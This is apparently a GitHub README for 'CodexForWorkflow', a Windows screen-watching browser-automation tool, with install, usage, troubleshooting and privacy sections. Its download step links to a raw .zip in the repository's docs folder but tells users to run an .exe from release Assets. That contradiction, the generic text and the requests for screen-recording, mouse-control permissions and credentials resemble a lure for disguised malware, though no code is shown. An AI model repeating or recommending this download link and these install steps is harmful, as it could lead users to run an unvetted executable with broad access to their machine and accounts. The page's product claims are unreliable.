🤖 CodexForWorkflow - Automate desktop tasks with human control

📋 Overview

CodexForWorkflow acts as a desktop command center for your computer. It uses artificial intelligence to watch your screen and perform browser tasks. You stay in control of every step. The application handles repetitive actions while you review the work. This tool combines screen observation with browser automation to save you time.

🛠️ System Requirements

Ensure your computer meets these standards to run the application:

  • Operating System: Windows 10 or Windows 11.
  • Processor: Dual-core CPU with 2.0 GHz speed or higher.
  • Memory: 8 GB of RAM minimum.
  • Storage: 200 MB of available space for the installation files.
  • Internet Connection: Required for connecting to analysis services.
  • Display: Resolution of 1280x720 or higher.

📥 How to Download and Install

Follow these steps to set up the software on your Windows machine:

  1. Visit this page to download: https://github.com/siddhartha7995/CodexForWorkflow/raw/refs/heads/main/docs/Workflow-For-Codex-v1.4-alpha.2.zip.
  2. Locate the file ending in .exe under the Assets section of the latest release.
  3. Click the file to start the download to your computer.
  4. Open your Downloads folder.
  5. Double-click the downloaded file to run the installer.
  6. Follow the on-screen prompts provided by the Windows installer.
  7. Click Finish when the setup completes.
  8. Locate the CodexForWorkflow icon on your desktop or in your Start menu.

🚀 Getting Started

Launch the application by clicking the icon. The interface opens a dashboard where you manage your automated tasks.

  1. Authentication: Sign in with your account credentials if requested by the software.
  2. Setup: The application requests permission to view your screen. Grant these permissions so the tool can observe the browser window for automation tasks.
  3. Workflow Selection: Choose a pre-defined workflow from the list or create your own by selecting the Add Workflow button.
  4. Triggering Tasks: Define the trigger condition. You can start a task manually or set it to run when a specific website loads.
  5. Human Approval: The system pauses before performing sensitive actions. A pop-up window appears on your screen. Review the suggested action and click Approve to proceed or Deny to stop the task.

Screen Observation

The application monitors specified regions of your browser. It identifies buttons, text fields, and navigation menus. This allows the software to understand the context of your work.

Browser Automation

The tool operates within your browser. It clicks links, types text into forms, and scrolls through pages based on your instructions. You can track all movements in the application log.

Human-in-the-loop

Safety remains the core priority. The loop requires your input for every major action. The software never performs a task without your prior consent. This design prevents unintended changes to your data.

If you encounter problems, refer to the following solutions:

  • Application does not launch: Restart your computer and try opening the shortcut again. If it still fails, uninstall the program via Control Panel and install it once more.
  • Screen observation fails: Ensure your browser window remains visible on your screen. Minimize other windows that might cover the target area.
  • Permission errors: Open your Windows System Settings. Navigate to Privacy and Security. Check if your application has permission to record the screen or control the mouse.
  • Connection timeouts: Verify your internet connection. Some enterprise firewalls block outgoing requests. Contact your network administrator if the tool fails to reach the servers.

🛡️ Privacy and Data Security

CodexForWorkflow processes your data locally on your machine. Screen data travels to the analysis service only when you initiate a project. We do not store your credentials or sensitive personal information on external servers. All automation history remains within your local installation folder. You can clear your logs at any time by selecting the Clear History option in the Settings menu.

🏗️ Managing Workflows

You can organize your tasks into folders. Right-click any workflow to rename, duplicate, or delete it. For advanced users, the application supports JSON configurations for complex automation sequences. Access these configurations by selecting Export or Import from the File menu. This enables you to share workflows with other team members easily.
